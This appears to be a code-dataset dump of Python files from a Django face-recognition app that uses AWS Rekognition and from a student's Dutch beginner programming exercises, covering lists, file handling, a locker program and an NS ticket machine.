faceMatch in response['FaceMatches']:\n\t\tposition = faceMatch['Face']['BoundingBox']\n\t\tconfidence = str(faceMatch['Face']['Confidence'])\n\t\tprint('The face at ' + \n\t\t\t\tstr(position['Left']) + ' ' + \n\t\t\t\tstr(position['Top']) + \n\t\t\t\t' matches with ' + confidence + '% confidence')"
},
{
"alpha_fraction": 0.7473002076148987,
"alphanum_fraction": 0.7537797093391418,
"avg_line_length": 29.733333587646484,
"blob_id": "0d3c43aa11bff140924e0de17cdf273d856174a6",
"content_id": "15b256b5e97267e90cbcec9412effc4ead4b7273",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 15,
"path": "/recognizer/models.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "import os\nfrom django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\ndef get_image_path(instance, filename):\n\treturn os.path.join('photos', str(instance.id), filename)\n\nclass Image(models.Model):\n\tuser = models.ForeignKey('auth.User')\n\tname = models.CharField(max_length=200, default=\"N/A\")\n\timage = models.ImageField(upload_to=get_image_path, blank=True, null=True)\n\tupload_date = models.DateTimeField(\n\t\tdefault=timezone.now)\n\t\n"
},
{
"alpha_fraction": 0.7736389636993408,
"alphanum_fraction": 0.7736389636993408,
"avg_line_length": 25.923076629638672,
"blob_id": "c0f053c08fe59c492cb37a78dd7d2bea1a01376a",
"content_id": "cbcaaa483a48dc96d59cab290b7e8d146b036954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 13,
"path": "/recognizer/urls.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\n\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport os\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.output, name='output'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)"
},
{
"alpha_fraction": 0.6745479702949524,
"alphanum_fraction": 0.682892918586731,
"avg_line_length": 27.760000228881836,
"blob_id": "85b379f6156bd4af3492c2593ab4d3c8de0d4a18",
"content_id": "95c5b6644bd3685279a1c418ffc864267b6f51b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 25,
"path": "/recognizer/face_search.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "import boto3\n\nBUCKET = \"amazon-rekognition\"\nKEY = \"{{ uploaded_file_url }}\"\nCOLLECTION = \"../media/photos/None/\"\n\ndef search_faces_by_image(bucket, key, collection_id, threshold=80, region=\"eu-west-1\"):\n\trekognition = boto3.client(\"rekognition\", region)\n\tresponse = rekognition.search_faces_by_image(\n\t\tImage={\n\t\t\t\"S3Object\": {\n\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\"Name\": key,\n\t\t\t}\n\t\t},\n\t\tCollectionId=collection_id,\n\t\tFaceMatchThreshold=threshold,\n\t)\n\treturn response['FaceMatches']\n\nfor record in search_faces_by_image(BUCKET, KEY, COLLECTION):\n\tface = record['Face']\n\tprint \"Matched Face ({}%)\".format(record['Similarity'])\n\tprint \" FaceId : {}\".format(face['FaceId'])\n\tprint \" ImageId : {}\".format(face['ExternalImageId'])\n"
}
] | 4 |
ColmHughes/day-16-20---Python-OOP | https://github.com/ColmHughes/day-16-20---Python-OOP | 27b36d0ff435f7ede2eb4a86547fe51096abbc1c | 7c6095e027cfb2ad4fa115fe9d4a13346211e1bf | 8da9136bace2c4b9ee6a8a9d90a68b3ee95b3ff8 | refs/heads/master | 2020-03-17T16:00:20.220841 | 2018-05-16T23:12:18 | 2018-05-16T23:12:18 | 133,732,362 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4389830529689789,
"alphanum_fraction": 0.4457627236843109,
"avg_line_length": 20.88888931274414,
"blob_id": "2479adb851ab3e0fa796460f818720a0c0e895ce",
"content_id": "907baa2c84ae5cc7d2d97ae3941ec3b8c25d8416",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 27,
"path": "/tree.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Tree():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n \n def add(self, value):\n if value < self.value:\n if t.left == None:\n t.left = Tree(value)\n else:\n t.left.add(value)\n else:\n if t.right == None:\n t.right = Tree(value)\n else:\n t.right.add(value)\n \n def get_nums(self):\n \nt = Tree()\nt.add(7)\nt.add(2)\nt.add(13)\nprint(t.value)\nprint(t.left.value)\nprint(t.right.value)"
},
{
"alpha_fraction": 0.48941799998283386,
"alphanum_fraction": 0.5052909851074219,
"avg_line_length": 15.47826099395752,
"blob_id": "8963f3ef46b20d71eda01475421fefc33bccc18d",
"content_id": "2ec173bbcb8c6e35eee37c6ac42734f2d75e8ac8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 23,
"path": "/donut.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Donut():\n \n \n def __init__(self):\n self.donut_size = 100\n \n def bite_donut(self):\n if self.donut_size > 0:\n self.donut_size -= 25\n \nt = Donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nprint(t.donut_size)\n\nprint(\"------------------------\")\n\ne = Donut()\ne.bite_donut()\nprint(e.donut_size)"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5016447305679321,
"avg_line_length": 18.483871459960938,
"blob_id": "3ba31645fb39e81b66484b3b73bc53c64b7121fb",
"content_id": "c6309f9483f4dc3f594be20e131b9764bed454e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 31,
"path": "/report.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Report():\n \n \n def __init__(self):\n self.content = 0\n \n \n def _print_header(self):\n print(\"This is the header\")\n \n def _print_body(self):\n print(\"This is the body\")\n \n def _print_footer(self):\n print(\"This is the footer\")\n \n def print_report(self):\n self._print_header()\n self._print_body()\n self._print_footer()\n \n \n \nclass UpperCaseReport(Report):\n def _print_body(self):\n print(\"UPPER CASE REPORT\")\n \n \n \nreport = UpperCaseReport()\nreport.print_report()\n "
},
{
"alpha_fraction": 0.5353383421897888,
"alphanum_fraction": 0.548872172832489,
"avg_line_length": 22.714284896850586,
"blob_id": "79b9a56a0a0fdb22cd87908341122dcbb9b6ff26",
"content_id": "d9248e6f3458b59ca1f3c29a8b569121727d8a60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 665,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 28,
"path": "/vehicle.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Vehicle():\n \n vehicles_running = 0\n \n def __init__(self):\n self.fuel = 100\n self.running = False\n \n def start(self):\n print(\"Starting up the Vehicle\")\n self.fuel -= 1\n self.running = True\n Vehicle.vehicles_running += 1\n \n def stop(self):\n print(\"Stopping the Vehicle\")\n self.running = False\n Vehicle.vehicles_running -= 1\n print(\"You have {0} vehicles running\".format(Vehicle.vehicles_running))\n \n \n def fuelgauge(self):\n print(\"You have {0} litres of fuel left\".format(self.fuel))\n \n \nv = Vehicle()\nv.start()\nprint(v.running)\n\n"
}
] | 4 |
SilentCeline/Yasmara_besten_V1J_PROGRAMMING | https://github.com/SilentCeline/Yasmara_besten_V1J_PROGRAMMING | b66cdbe2c287c257ec7fbadd73d26aeb6c12cc40 | d9b7e7836c6906a040f589552de1fc2a70478545 | 078d0b46ecec5c23ca62340fa2d6193c6e0e1d55 | refs/heads/master | 2020-04-02T22:49:00.472718 | 2018-10-26T14:11:48 | 2018-10-26T14:11:48 | 154,845,461 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6122254133224487,
"alphanum_fraction": 0.6131805181503296,
"avg_line_length": 25.200000762939453,
"blob_id": "b69e27cd1edfed54194fddcc03ddfc5ef6530358",
"content_id": "1bde99bae2107006b50d827e7a6b2dc1275ec2b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 40,
"path": "/Les 12/programming_3_xml_stationslijsten.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import xmltodict\n\ndef processXML(filename):\n with open(filename) as myXMLfile:\n filecontenstring = myXMLfile.read()\n xmldictonary = xmltodict.parse(filecontenstring)\n return xmldictonary\n\nnamendict = processXML('prog_stationslijst.xml')\nstations = namendict['Stations']['Station']\n\ndef een():\n codeplustype = ''\n for station in stations:\n codeplustype += 'Dit zijn de codes en types van de 4 stations:' + '\\n' + (station['Code']) + ' - ' + (station['Type']) + '\\n'\n\n print(codeplustype)\n\neen()\n\ndef twee():\n zinsynoniemen = ''\n for station in stations:\n if station['Synoniemen'] is not None:\n zinsynoniemen += str(station['Code']) + ' - ' + str(station['Type']) + ' ' + str(station['Synoniemen']['Synoniem']) + '\\n'\n else:\n continue\n\n print(zinsynoniemen)\n\n\ntwee()\n\ndef drie():\n langenamenstation = ''\n for station in stations:\n langenamenstation += str(station['Code']) + ' - ' + station['Namen']['Lang'] + '\\n'\n print(langenamenstation)\n\ndrie()"
},
{
"alpha_fraction": 0.5584415793418884,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 18.5,
"blob_id": "9cbf186aca6d856960885bdce159c9a2c6c3bf02",
"content_id": "c31636ae7d945102db8051af224e58d6ddd7300b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 4,
"path": "/les6/programming_2_functie_met_list_parameter.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def som(getallenlijst):\n print (sum(getallenlijst))\n\nsom ([5, 8, 9, 5, 5])"
},
{
"alpha_fraction": 0.5668449401855469,
"alphanum_fraction": 0.5814292430877686,
"avg_line_length": 34.482757568359375,
"blob_id": "983e9edbbeb8ff016e675fff54359e0c8f6fb061",
"content_id": "8cafffb01fd26e73e31e568a49b9c41c03457edd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2057,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 58,
"path": "/les 8/programming_finalassignment_bagagekluizen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def toon_aantal_kluizen_vrij(tekst_bestand):\n max_aantal_kluizen = 12\n aantal_regels = 0\n for i in tekst_bestand:\n if i == '\\n':\n aantal_regels += 1\n print(\"Aantal kluizen vrij: \", max_aantal_kluizen - aantal_regels)\n\ndef nieuwe_kluis(tekstBestand):\n kluisnummers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n gebruikte_kluisnummer = []\n bruikbare_nummers = []\n for line in tekstBestand:\n currentline = line.split(\";\")\n gebruikte_kluisnummer.append(int(currentline[0]))\n for x in kluisnummers:\n if x not in gebruikte_kluisnummer:\n bruikbare_nummers.append(x)\n if len(gebruikte_kluisnummer) < 12:\n wachtwoord = input(\"Voer uw wachtwoord van minimaal 4 tekens in: \")\n if len(wachtwoord) >= 4:\n bestand = open(\"Kluizen.txt\", \"a\")\n bestand.write(str(min(bruikbare_nummers)) + ';' + str(wachtwoord) + '\\n')\n bestand.close()\n print('Uw kluisnummer is: ' + str(min(bruikbare_nummers)))\n return\n else:\n print(\"Er zijn geen kluizen beschikbaar.\")\n\n return\n\ndef kluis_openen(bestand):\n nummer = input(\"Wat is uw kluisnummer: \")\n wachtwoord = input(\"Wat is uw wachtwoord: \")\n gegevens = nummer + ';' + wachtwoord + '\\n'\n if gegevens in bestand:\n print(\"Kluis nummer \" + str(nummer) + \" is nu open.\")\n else:\n print(\"Kluisnummer en/of code incorrect.\")\n return\n\ndef main():\n bestand = open(\"Kluizen.txt\", \"r+\")\n tekst_bestand = bestand.readlines()\n bestand.close()\n print(\"1: Ik wil weten hoeveel kluizen nog vrij zijn \\n2: Ik wil een nieuwe kluis \\n3: Ik wil iets uit mijn kluis halen\")\n keuze = int(input(\"Wat wilt u doen: \"))\n if keuze == 1:\n toon_aantal_kluizen_vrij(tekst_bestand)\n elif keuze == 2:\n nieuwe_kluis(tekst_bestand)\n elif keuze == 3:\n kluis_openen(tekst_bestand)\n else:\n print(\"Foute invoer; Voer een andere optie in\")\n\n\nmain()"
},
{
"alpha_fraction": 0.7118644118309021,
"alphanum_fraction": 0.7457627058029175,
"avg_line_length": 18.83333396911621,
"blob_id": "1295c157bc51c9efd180b5b71db9bc30a2c05a98",
"content_id": "2409093772c729d78906705b4b21a184510ba615",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 6,
"path": "/les3/Programming_1_listsENstrings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "favorieten = ['K3']\nprint(favorieten)\nfavorieten.append('K4')\nprint(favorieten)\nfavorieten[1] = 'K5'\nprint(favorieten)"
},
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.6376811861991882,
"avg_line_length": 22.33333396911621,
"blob_id": "11c18314f3d319dcfb10580717252911fd71b9a9",
"content_id": "3fafb689f165d76ac11bfff26cc404b67c4c9ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 3,
"path": "/les3/Programming_2_listsENnumbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "list = [3,7,-2,12]\nverschil = (max(list) - min(list))\nprint(verschil)"
},
{
"alpha_fraction": 0.5158730149269104,
"alphanum_fraction": 0.5634920597076416,
"avg_line_length": 10.409090995788574,
"blob_id": "1fb92657e194f46254b946e2b63c63920a88086c",
"content_id": "c628ddec4b32768e9ef30f60ddb00249ca0f0378",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 22,
"path": "/Les 12/programming_2_namespaces.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "b = 7\n\ndef verdubbelB(b):\n b = b + b\n print(b)\n\nverdubbelB(7)\n\nprint(b)\n\nimport datetime\ntime = datetime.datetime.today()\nprint(time.strftime((\"%H:%M:%S\")))\n\n\ndef g(x):\n return 5 + x + 10 #18\n\ndef f(y):\n return 2*y + 1 #7\n\nprint(f(3)+ g(3))\n\n"
},
{
"alpha_fraction": 0.7147239446640015,
"alphanum_fraction": 0.7177914381027222,
"avg_line_length": 31.700000762939453,
"blob_id": "894f299b1ad590a0e6225c2396446c5a79652568",
"content_id": "cf5ca6a09cc6e611d2fd2265874824afe1c38ec6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 10,
"path": "/les6/programming_4_functie_met_if.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "oldpassword_input = input(\"Voer uw oude wachtwoord in: \")\nnewpassword_input = input(\"Voer uw nieuwe wachtwoord in: \")\n\ndef new_password(oldpassword,newpassword):\n if newpassword != oldpassword and len(newpassword) > 6:\n return(True)\n else:\n return(False)\n\nnew_password(oldpassword_input, newpassword_input)"
},
{
"alpha_fraction": 0.6158273220062256,
"alphanum_fraction": 0.6618704795837402,
"avg_line_length": 33.79999923706055,
"blob_id": "d06ab311d096fd6976535395fcf6d7a1e0c2f7cd",
"content_id": "b5532a165c45f5c7669cce4c0e6dbe6b7a6c2da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/les 8/programming_4_two-dimensional_lists.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "studentencijfers = [ [95, 92, 86],[66, 75, 54],[89, 72, 100],[34, 0, 0] ]\n\ndef gemiddelde_per_student(studentencijfers):\n gemiddelde_per_student = []\n for i in studentencijfers:\n gemiddelde = (i[0] + i[1] + i[2]) / 3\n gemiddelde_per_student.append(gemiddelde)\n return gemiddelde_per_student\n\ndef gemiddelde_van_alle_studenten(studentencijfers):\n totaal = 0\n aantal = len(studentencijfers[0])\n for i in studentencijfers:\n cijfer = i[0] + i[1] + i[2]\n totaal += cijfer / aantal\n totaal = totaal / len(studentencijfers)\n return totaal\n\nprint(gemiddelde_per_student(studentencijfers))\nprint(gemiddelde_van_alle_studenten(studentencijfers))"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6315789222717285,
"avg_line_length": 24.66666603088379,
"blob_id": "b94f4730d38740f1fae4fd9e7faf4b10a3e5a9fa",
"content_id": "a62c892e660293018a0f8bce5ceade08ea8631a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/les5/programming_4_for_if_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "week = ['maandag','dinsdag','woensdag']\nfor dag in week:\n print(dag[0:2])"
},
{
"alpha_fraction": 0.6750115752220154,
"alphanum_fraction": 0.6754751801490784,
"avg_line_length": 52.95000076293945,
"blob_id": "c1b7484ce421b784786c0c38e370151467791ab9",
"content_id": "c06460bd0c7ef60299891ec713a36f29230e06ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2157,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 40,
"path": "/les 10/programming_final_assignment_ns_kaartautomaat.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def inlezen_beginstation(stations):\n beginstation_input = input('Voer uw begin station in: ')\n while True:\n if beginstation_input in stations:\n print('Het beginstation is ' + str(beginstation_input))\n return beginstation_input\n break\n else:\n print('Dit station it niet in dit traject, controleer uw spelling of vul een geldig station in.')\n beginstation_input = input('Voer uw begin station in: ')\n continue\n\ndef inlezen_eindstation(stations, beginstation):\n eindstation_input = input('Voer uw eind station in: ')\n while True:\n if eindstation_input in stations and stations.index(eindstation_input) > stations.index(beginstation):\n print('Het eindstation is ' + str(eindstation_input))\n return eindstation_input\n break\n else:\n print('Dit station it niet in dit traject, controleer uw spelling of vul een geldig station in.')\n eindstation_input = input('Voer uw eind station in: ')\n continue\n\ndef omroepen_reis(stations, beginstation, eindstation):\n beginnummer = stations.index(beginstation)\n beginnummerzin = 'Het beginstation is ' + str(beginstation) + ' is het ' + str(beginnummer) + 'e station in het traject' + '\\n'\n eindnummer = stations.index(eindstation)\n eindnummerzin = 'Het eindstation is ' + str(eindstation) + ' is het ' + str(eindnummer) + 'e station in het traject' + '\\n'\n afstand = eindnummer - beginnummer\n afstandzin = 'De afstand bedraagd ' + str(afstand) + ' station(s)' + '\\n'\n ritprijs = afstand * 5\n ritprijszin = 'De prijs van het kaartje is ' + str(ritprijs) + ' euro' + '\\n'\n\n print(beginnummerzin,eindnummerzin,afstandzin,ritprijszin)\n\nstations = ['Schagen', 'Heerhugowaard', 'Alkmaar', 'Castricum', 'Zaandam', 'Amsterdam Sloterdijk', 'Amsterdam Centraal', 'Amsterdam Amstel', 'Utrecht Centraal','\\'s-Hertogenbosch', 'Eindhoven', 'Weert', 'Roermond', 'Sittard', 'Maastricht']\nbeginstation = inlezen_beginstation(stations)\neindstation = inlezen_eindstation(stations, beginstation)\nomroepen_reis(stations, beginstation, eindstation)"
},
{
"alpha_fraction": 0.5317604541778564,
"alphanum_fraction": 0.6406533718109131,
"avg_line_length": 25.285715103149414,
"blob_id": "619010d550ff7dbf19610620949eee2dec70dffc",
"content_id": "ff9a9ea662731c642b1bd2d82ca323eeea53e4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/les 7/programming_4_files_schrijven.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "file = open('hardlopers.txt', 'a')\nimport datetime\nvandaag = datetime.datetime.today()\ns = vandaag.strftime(\"%a %d %b %Y, %I:%m:%S, \")\n\nklaarinput = 'nee'\ndatatotaal = ''\n\nwhile klaarinput != 'ja':\n naaminput = input('Wat is je naam: ')\n datatotaal += str(s) + str(naaminput) + '\\n'\n file.write(datatotaal)\n klaarinput = input('Ben je klaar?(ja/nee): ')\n\nfile.close()\n\n#Thu 10 Mar 2016, 10:45:52, Miranda\n#Thu 10 Mar 2016, 10:46:04, Piet\n#Thu 10 Mar 2016, 10:47:27, Sacha\n#Thu 10 Mar 2016, 10:48:33, Karel\n#Thu 10 Mar 2016, 10:48:42, Kemal"
},
{
"alpha_fraction": 0.6065163016319275,
"alphanum_fraction": 0.6065163016319275,
"avg_line_length": 29.769229888916016,
"blob_id": "38b71bab83e9eeb1e9f9eb1cf8b58fa363656b8e",
"content_id": "85ae6b9363e0e35bb6be47acfcd70a6275696b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 13,
"path": "/les 10/programming_1_sets.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "bruin = {'Boxtel', 'Best', 'Beukelaan', 'Eindhoven', 'Helmond \\'t hout', 'Helmond', 'Helmond Brouwhuis', 'Duerne'}\ngroen = {'Boxtel', 'Best', 'Beukelaan', 'Eindhoven', 'Geldrop', 'Heeze', 'Weert'}\n\nprint(groen.intersection(bruin))\nprint(groen.difference(bruin))\nprint(groen.union(bruin))\n\n#def overeenkomsten():\n #for i in groen:\n #if i == bruin:\n #print(i , end=', ')\n\n#def verschillen():"
},
{
"alpha_fraction": 0.46979865431785583,
"alphanum_fraction": 0.5906040072441101,
"avg_line_length": 14,
"blob_id": "27047d76f46cff2aaa349701f627eb523549dec8",
"content_id": "8f8b2645f11ced15cfdc9ea1dc32fac9c432d0c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 10,
"path": "/les1en2/Programming_1_Expressions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "print (5.0)\nprint (type(5.0))\nprint (5%2)\nprint (type(5%2))\nprint (5>1)\nprint (type(5>1))\nprint ('5')\nprint (type('5'))\nprint (5*2)\nprint (type(5*2))"
},
{
"alpha_fraction": 0.6375158429145813,
"alphanum_fraction": 0.6501901149749756,
"avg_line_length": 29.346153259277344,
"blob_id": "ca26a0e35c21c5edb2c84836b5481509b240b710",
"content_id": "8d158ae688a9b80bebe15aba51290af57858f2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/les 7/programming_3_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "#file = open(\"kaartnummers.txt\", 'r')\n#inhoud = file.read()\n#regels = inhoud.count('\\n')\n#getal = max(str(inhoud))\n#regels2 = getal.count('\\n') + 1\n#print(inhoud)\n#print('Deze file telt ' + str(regels) + ' regels')\n#print('Het grootste kaartnummer is: ' + str(getal) + ' en dat staat op regel ' + str(regels2))\n\n#file.close()\n\nfile2 = open(\"kaartnummers.txt\")\nlines = file2.readlines()\nfile2.close()\n\nhoogstegetal = 0\nhoogsteregel = -1\n\nfor line in lines:\n currentline = line.split(',')\n getal = eval(currentline[0].strip())\n if getal > hoogstegetal:\n hoogstegetal = getal\n hoogsteregel = lines.index(line) + 1\nprint('Deze file telt ' + str(len(lines)) + ' regels')\nprint('Het grootste kaartnummer is: ' + str(getal) + ' en dat staat op regel ' + str(hoogsteregel))\n"
},
{
"alpha_fraction": 0.5220434069633484,
"alphanum_fraction": 0.6347095966339111,
"avg_line_length": 29.340425491333008,
"blob_id": "097fef0a13b5c4ee79b265f134c7f22ce094764e",
"content_id": "8ba29e6027274cf66731b98174349ad724b7f270",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 47,
"path": "/les6/programming_finalassignment_nsfuncties.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def standaardprijs(afstandKM):\n if afstandKM > 50:\n res = 15 + afstandKM*0.6\n else:\n res = afstandKM*0.8\n if res < 0:\n res = 0\n return res\n\ndef ritprijs(leeftijd, weekendrit, afstandKM):\n standaard = (standaardprijs(afstandKM))\n if (weekendrit == False) and (leeftijd < 12 or leeftijd >= 65):\n prijs = standaard * 0.70\n elif (weekendrit == True) and (leeftijd < 12 or leeftijd >= 65):\n prijs = standaard * 0.65\n elif (weekendrit == True) and (leeftijd >= 12 or leeftijd < 65):\n prijs = standaard * 0.60\n else:\n prijs = standaard\n print(prijs)\n\nritprijs(65, False, -1)\n\n#test1 = ritprijs(11, True,45)\n#test2 = ritprijs(12, True,45)\n#test3 = ritprijs(64, True,45)\n#test4 = ritprijs(65, True,45)\n#test5 = ritprijs(11, False,45)\n#test6 = ritprijs(12, False,45)\n#test7 = ritprijs(64, False,45)\n#test8 = ritprijs(65, False,45)\n#test9 = ritprijs(11, True,51)\n#test10 = ritprijs(12, True,51)\n#test11 = ritprijs(64, True,51)\n#test12 = ritprijs(65, True,51)\n#test13 = ritprijs(11, False,51)\n#test14 = ritprijs(12, False,51)\n#test15 = ritprijs(64, False,51)\n#test16 = ritprijs(65, False,51)\n#test17 = ritprijs(11, True, -1)\n#test18 = ritprijs(12, True, -1)\n#test19 = ritprijs(64, True, -1)\n#test20 = ritprijs(65, True, -1)\n#test21 = ritprijs(11, True, -1)\n#test22 = ritprijs(12, False, -1)\n#test23 = ritprijs(64, False, -1)\n#test24 = ritprijs(65, False, -1)\n\n\n\n"
},
{
"alpha_fraction": 0.7710437774658203,
"alphanum_fraction": 0.7710437774658203,
"avg_line_length": 48.66666793823242,
"blob_id": "44dac424c490e27fdc499a1b8dc255e6574d4e1f",
"content_id": "4d7bbec3e29359acfba1c9c11d6f9b7d1fc17dd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 297,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 6,
"path": "/les1en2/Programming_2_Strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "print (len('Supercalifragilisticexpialidocious'))\nprint ('ice' in 'Supercalifragilisticexpialidocious')\nprint ('Antidisestablishmentarianism' > 'Honorificabilitudinitatibus')\nlistname = [\"Berlioz\", \"Borodin\", \"Brian\", \"Bartok\", \"Bellini\", \"Buxtehude\", \"Bernstein\"]\nlistname.sort()\nprint (listname)"
},
{
"alpha_fraction": 0.38989168405532837,
"alphanum_fraction": 0.46209385991096497,
"avg_line_length": 15.352941513061523,
"blob_id": "1f9774a5620b24b1f80060656790120ac85df015",
"content_id": "5483b706e355905bf2ec87a7cc1781eda7c4c83c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 17,
"path": "/Les 9/programming_3_dict.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "studenten = {\n 'Yasmara':4.5,\n 'Hellez':9.3,\n 'Jeroen':5.8,\n 'Ehsan':9.0,\n 'Simeon':6.7,\n 'Bruus':9.8,\n 'Dennis':9.9,\n 'Jolanda':3.5,\n 'Henk':5.5,\n}\nhelp = ''\nfor k,v in studenten.items():\n if v > 8.9:\n print(k,v)\n else:\n continue"
},
{
"alpha_fraction": 0.6087499856948853,
"alphanum_fraction": 0.6087499856948853,
"avg_line_length": 35.40909194946289,
"blob_id": "dff25577037bd98fc1238b0fbbe3bcca0b299590",
"content_id": "2230e0c7443bb23720df8ce228dc0036792d9c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 22,
"path": "/Les 11/programming_2_cvs_files_schrijven.py",
